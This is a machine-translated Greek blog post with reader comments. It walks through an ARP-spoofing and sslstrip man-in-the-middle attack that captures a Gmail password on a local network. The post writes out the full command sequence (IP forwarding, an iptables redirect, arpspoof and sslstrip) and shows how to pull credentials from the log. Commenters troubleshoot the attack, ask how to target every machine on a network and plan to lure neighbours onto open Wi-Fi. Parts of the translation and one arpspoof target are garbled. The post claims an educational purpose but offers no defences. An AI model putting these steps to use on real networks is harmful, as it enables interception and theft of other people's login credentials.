ArpSpoofing και SSlstrip σε δράση.

Γεια σας Bloggers.

Προς το παρόν έχω ένα μικρό δείγμα για το πόσο επικίνδυνο μπορεί να είναι η σύνδεση σε οποιοδήποτε δίκτυο χωρίς ασφάλεια αυτών που τόσοι πολλοί από εμάς αρέσουν.

Για σήμερα, πρόκειται να χρησιμοποιήσω το ArpSpoofing με το Sslstrip για να λάβω έναν κωδικό πρόσβασης Gmail. Για να κάνω το περιβάλλον πιο ελεγχόμενο, έχω δημιουργήσει έναν λογαριασμό που ονομάζεται "testarp@gmail.com".

Και επειδή δεν μου αρέσουν τα προοίμια, ας ξεκινήσουμε τις δουλειές μας.

Δεν είμαι ποτέ υπεύθυνος για το τι μπορούν να κάνουν με τις ακόλουθες πληροφορίες. Το κάνω αποκλειστικά για εκπαιδευτικούς σκοπούς

ΠΕΡΙΒΑΛΛΟΝ

Για αυτό το τεστ αυτό που έχουμε είναι το εξής:

1. Επιτιθέμενος: Ο επιτραπέζιος ή επιτραπέζιος υπολογιστής μου έχει το Debian Wheezy. Από τα αποθετήρια μπορείτε να εγκαταστήσετε sslstrip y dsniff να πάρει άρπας

2. Θύμα: Το θύμα είναι ένα Tablet Android που θέλει να δει μόνο τα μηνύματά του μέσω του προγράμματος περιήγησης.

3. Το μέσο: Η μέση είναι δική μου Δρομολογητής Cisco DPC2425

ΔΙΕΥΘΥΝΣΕΙΣ.

Διεύθυνση εισβολέα: 172.26.0.2

Διεύθυνση δρομολογητή: 172.26.0.1

Διεύθυνση θύματος: 172.26.0.8

Η ΕΠΙΘΕΣΗ:

Για να καταλάβετε λίγο περισσότερο πώς λειτουργεί η επίθεση, μπορείτε να πάτε στο παλιό μου ΜΕΤΑ

Το πρώτο πράγμα που θα κάνουμε για αυτήν την επίθεση είναι να ενεργοποιήσουμε το προς τα εμπρός έτσι ώστε ο υπολογιστής μας να μπορεί να προωθήσει τις πληροφορίες στο θύμα χωρίς να το παρατηρήσει. (Διαφορετικά θα ήταν επίθεση άρνησης παροχής υπηρεσιών)

Για αυτό θα χρησιμοποιήσουμε:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Κάθε εντολή σε ένα παράθυρο άμεσης κονσόλας.

Τώρα αν κάνουμε ουρά -φ desdelinux βλέπουμε τις πληροφορίες ζωντανά και άμεσα

στιγμιότυπο1

Λοιπόν, πώς παίρνουμε αυτό που θέλουμε;

Ας εισάγουμε πρώτα την αλληλογραφία μας στο Tablet. Κατά τη σύνδεση, βλέπουμε ότι χιλιάδες και χιλιάδες πράγματα εμφανίζονται στην κονσόλα μας.

Τώρα που τελείωσε ας ανοίξουμε το αρχείο μας "desdelinux” με νανο

nano desdelinux

με το Control + W αναζητάμε κάτι που ονομάζεται SECURE POST.

Και θα δούμε κάτι τέτοιο.

στιγμιότυπο2

Μεταξύ αυτής της τεράστιας γραμμής που δεν μπορεί να δει είναι το email και ο κωδικός πρόσβασης του θύματος.

Τρέχουμε λοιπόν προς τα δεξιά μέχρι να δούμε επιτέλους το φως στο τέλος της σήραγγας.

στιγμιότυπο3

Σε άλλη περίπτωση θα δούμε πώς μπορούμε να προστατευτούμε λίγο από αυτές τις επιθέσεις.

αφορά


Αφήστε το σχόλιό σας

Η διεύθυνση email σας δεν θα δημοσιευθεί. Τα υποχρεωτικά πεδία σημειώνονται με *

*

*

  1. Υπεύθυνος για τα δεδομένα: Miguel Ángel Gatón
  2. Σκοπός των δεδομένων: Έλεγχος SPAM, διαχείριση σχολίων.
  3. Νομιμοποίηση: Η συγκατάθεσή σας
  4. Κοινοποίηση των δεδομένων: Τα δεδομένα δεν θα κοινοποιούνται σε τρίτους, εκτός από νομική υποχρέωση.
  5. Αποθήκευση δεδομένων: Βάση δεδομένων που φιλοξενείται από τα δίκτυα Occentus (ΕΕ)
  6. Δικαιώματα: Ανά πάσα στιγμή μπορείτε να περιορίσετε, να ανακτήσετε και να διαγράψετε τις πληροφορίες σας.

  1.   @Jlcmux dijo

    Παίρνω αυτήν την ευκαιρία να πω ότι όταν δημοσιεύτηκε η ανάρτηση, οι εντολές δεν ήταν σωστές.

    Στην εντολή iptables λείπει το 8080 που βρίσκεται σε άλλη γραμμή. Και τότε οι εντολές arpspoof ήταν όλες στην ίδια γραμμή. Κάθε εντολή βρίσκεται σε διαφορετική γραμμή.

    Ας ελπίσουμε ότι ο συντάκτης το βλέπει και μπορεί να το διορθώσει.

    Χαιρετισμούς.

    1.    Μανουέλ ντε λα Φουέντε dijo

      Έχω κάνει τις διορθώσεις που αναφέρατε, είναι εντάξει;

      Εάν πρόκειται να εισαγάγετε κωδικό σε μια προτιμώμενη καταχώριση, χρησιμοποιήστε την προβολή HTML και βεβαιωθείτε ότι το άρθρο είναι σωστό πριν το στείλετε σε εκκρεμότητα. Ευχαριστώ.

  2.   Luis dijo

    Είναι συγκλονιστικό να γνωρίζουμε ότι όσοι από εμάς δεν έχουμε γνώση είναι τόσο ευάλωτοι. Πολύ καλές πληροφορίες ακόμη και όταν καταλαβαίνω λίγα από το θέμα συνειδητοποιώ τη σημασία. Ευχαριστώ!
    αφορά

  3.   Γκίσκαρντ dijo

    Αλλά αυτό λειτουργεί μόνο εάν ο εισβολέας και το θύμα βρίσκονται στο ίδιο δίκτυο. Σε κάθε περίπτωση, μου φαίνεται ότι εάν (βρίσκεστε στο ίδιο δίκτυο) συνδεθείτε χρησιμοποιώντας HTTPS που δεν συμβαίνει επειδή τα δεδομένα κρυπτογραφούνται ΠΡΙΝ βγείτε από το μηχάνημά σας. Εάν συνδεθείτε μέσω HTTP (χωρίς S) νομίζω ότι ακόμη και κοιτάζοντας το καλώδιο δικτύου βλέπετε τα πλήκτρα.

    1.    @Jlcmux dijo

      Δεν είναι αλήθεια. Παραβιάζω έναν κωδικό πρόσβασης gmail και αν παρατηρήσετε ότι το Gmail χρησιμοποιεί https. Ετσι? Το θέμα είναι ότι αν και το https είναι ασφαλές, εξαρτάται από το http. Άρα δεν είναι τόσο ασφαλές.

      Μην ομολογείτε τόσο πολύ για ένα https που το S δεν είναι για τον Superman, αλλά για "ασφαλές"

    2.    Rten dijo

      λειτουργεί με ή χωρίς https, το δοκίμασα με μια πιο εξειδικευμένη διανομή linux και λειτουργεί χωρίς προβλήματα

    3.    Μανουέλ ντε λα Φουέντε dijo

      Μπορείτε να το χρησιμοποιήσετε με ακρίβεια για να μάθετε σε όσους κλέβουν το Wi-Fi σας ένα μάθημα. 😀

      Είναι λίγο πολύ σαν αυτό που είπαν εδώ και πολύ καιρό στο blog της Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Ραγιάντ dijo

        Ostia, υπέροχο τι κάνει! / Και μετά λένε το παρανοϊκό μου κάθε φορά που χρησιμοποιώ το VPN όταν πηγαίνουν για να ελέγξουν τον τραπεζικό λογαριασμό…). Παρεμπιπτόντως, πρέπει να δεις πόσο κυνικοί άνθρωποι στα σχόλια ... αν στο τέλος κλέβει ...

        1.    eliotime3000 dijo

          Τώρα πρέπει να πάρουμε ένα σεμινάριο για το πώς να δημιουργήσουμε και να προσφέρουμε τη δική σας υπηρεσία VPN.

      2.    Daniel dijo

        Η ιστορία που συνδέετε είναι πολύ ενδιαφέρουσα, φαίνεται μάλιστα άξια ενός νέου βιβλίου και αυτό με κάνει να θυμάμαι όταν χρησιμοποίησα το Διαδίκτυο των γειτόνων μου και παρόλο που λέω ότι γνωρίζω το θέμα, νομίζω ότι δεν θα μπορούσα ποτέ να δω τις πραγματικές διαστάσεις του κινδύνου που θα μπορούσα να είχα τελευταίο, ευτυχώς για μένα, άλλαξαν μόνο τον κωδικό πρόσβασης σε WPA2 και από εκεί ξεκίνησε η ιστορία μου με τον ISP

    4.    Μαυρίκιος dijo

      Γι 'αυτό ο τίτλος λέει Sslstrip σε δράση.

      Λειτουργεί, αρκεί ο εισβολέας να είναι στη μέση

  4.   εντός ολίγου dijo

    Τι κύμα εργάζεστε στο πρίσμα; --.-
    όχι.
    Τι περιμένετε να στείλετε το αίτημά σας XD
    αφορά
    καλή θέση

  5.   auroszx dijo

    Ενδιαφέρον, θα κάνω ένα εκπαιδευτικό τεστ αργότερα ... Ίσως θα μπορούσα να καταργήσω τον κωδικό πρόσβασης στο WiFi και να διασκεδάσω λίγο for
    Κατά τύχη, μπορείτε να κάνετε κάτι παρόμοιο για να στείλετε διαφορετικές σελίδες σε αυτές που ζητήθηκαν από τον στόχο; Για παράδειγμα, θέλουν να ανοίξουν το Facebook και να τα ανακατευθύνω στο Google; 😛

    1.    @Jlcmux dijo

      Ναί. Αλλά όλα είναι πολύ διαφορετικά.

      Ίσως θα το δημοσιεύσω αργότερα.

  6.   Lastnewbie dijo

    πολύ καλή δημοσίευση, αυτά τα θέματα είναι πολύ εκπαιδευτικά, τώρα πρέπει να είμαστε σε θέση να αντιμετωπίσουμε αυτήν την επίθεση, καθώς ορισμένοι (όπως εγώ) συνδέονται με δημόσια δίκτυα (για παράδειγμα το πανεπιστήμιο) θα ήταν χρήσιμο να το αποφύγουμε.

    Χαιρετισμούς!

  7.   just-another-dl-χρήστης dijo

    Δεν λειτούργησε για μένα 🙁

  8.   χαίρο dijo

    Κάτι με αποτυγχάνει εδώ, εκτός από το γεγονός ότι οι συνδέσεις https κρυπτογραφούνται μέσω πιστοποιητικού διακομιστή (μόλις έχετε το πιστοποιητικό στο μηχάνημά σας, το πρόγραμμα περιήγησής σας είναι υπεύθυνο για την κρυπτογράφηση) με iptables ανακατευθύνετε τη θύρα 80 (http) , όχι το 443 που είναι https

    1.    @Jlcmux dijo

      Το σκέφτηκα και εγώ. Το θέμα είναι ότι αν και το https είναι "ασφαλές", δυστυχώς εξαρτάται από το http. Έτσι το sslstrip το εκμεταλλεύεται, κάνει το πρόγραμμα περιήγησης να πιστεύει ότι χρησιμοποιεί διαπιστευτήρια https αλλά δεν είναι.

      1.    χαίρο dijo

        Γαμώτο! αλλά το πρόγραμμα περιήγησης θα πρέπει να βλέπει μια προειδοποίηση όπως "αυτό το πιστοποιητικό προέρχεται από έναν ύποπτο ιστότοπο ή κάτι τέτοιο" ... σίγουρα θα πρέπει να κάνω δοκιμές XD

        1.    @Jlcmux dijo

          Όχι, απολύτως τίποτα δεν βγαίνει.

  9.   just-another-dl-χρήστης dijo

    Δούλεψε τελικά για μένα
    Είμαι συνδεδεμένος σε δίκτυο WEP με κωδικό πρόσβασης και μου έδειξε τον κωδικό πρόσβασης.

    Μια ερώτηση. Μπορείτε να κάνετε την ίδια διαδικασία, αλλά για όλους τους υπολογιστές που είναι συνδεδεμένοι στο δίκτυο, αντί να έχετε ένα μόνο θύμα;

    1.    @Jlcmux dijo

      Ναι μπορείς. Αλλά δεν έχω κάνει πειράματα. Δοκιμάστε το μόνοι σας και πείτε μας πώς πηγαίνει.

  10.   Σινικ 19 dijo

    Το μόνο πράγμα που έχω με αυτό είναι ότι το μηχάνημα του θύματος είναι εκτός σύνδεσης, αλλά το sslstrip δεν μου δείχνει τίποτα: /

    1.    @Jlcmux dijo

      Πρέπει να απενεργοποιήσετε το τείχος προστασίας για μια στιγμή. Ή τουλάχιστον ενεργοποιήστε τις εισερχόμενες συνδέσεις.

  11.   Κύριε Black dijo

    Ο Probe και εγώ μπορούσαμε να δούμε μόνο το όνομα χρήστη και τον κωδικό πρόσβασης της σελίδας facebook, στο gmail δεν βρήκα κανένα αποτέλεσμα στο αρχείο καταγραφής, επίσης χρειαζόμουν μόνο μια γραμμή arpspoof «arpspoof -i -t». Από την άλλη πλευρά, η μηχανή του θύματος δεν μπόρεσε να ανοίξει μερικές σελίδες. Θα συνεχίσω τη διερεύνηση, είναι πολύ ενδιαφέρον. Μια βοήθεια για όσους χρησιμοποιούν το Manjaro, τα πακέτα για εγκατάσταση είναι: dsniff (εδώ είναι το arpspoff), στριμμένα και python2-pyopenssl. Μπορείτε να κατεβάσετε το Sslstrip από εδώ: http://www.thoughtcrime.org/software/sslstrip/
    Για να το εκτελέσετε $ python2 sslstrip.py
    Χαιρετισμούς.

  12.   Κύριε Black dijo

    Δεν βγήκε αλλά η γραμμή arpspoof είναι: #arpspoof -i int -t ip-korban ip-router

  13.   μονάδα μαγνητοκινητικής δύναμης dijo

    κοίτα κάνω ακριβώς αυτό που λέτε:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    το πρόβλημα είναι ότι το θύμα που είναι άλλος υπολογιστής που έχω εδώ στο δωμάτιό μου, δεν έχω καμία σχέση με το σημείο που πρέπει να επανεκκινήσω τον δρομολογητή, τι μπορώ να με βοηθήσω.

    Ένα άλλο πράγμα που δουλεύω με μια εικονική μηχανή και όταν εκτελώ την εντολή iwconfig, το wlan0 δεν εμφανίζεται, ούτε όταν εκτελώ το ifconfig, ωστόσο αν έχω internet στο εικονικό μου μηχάνημα, τι με μια διεπαφή eth0.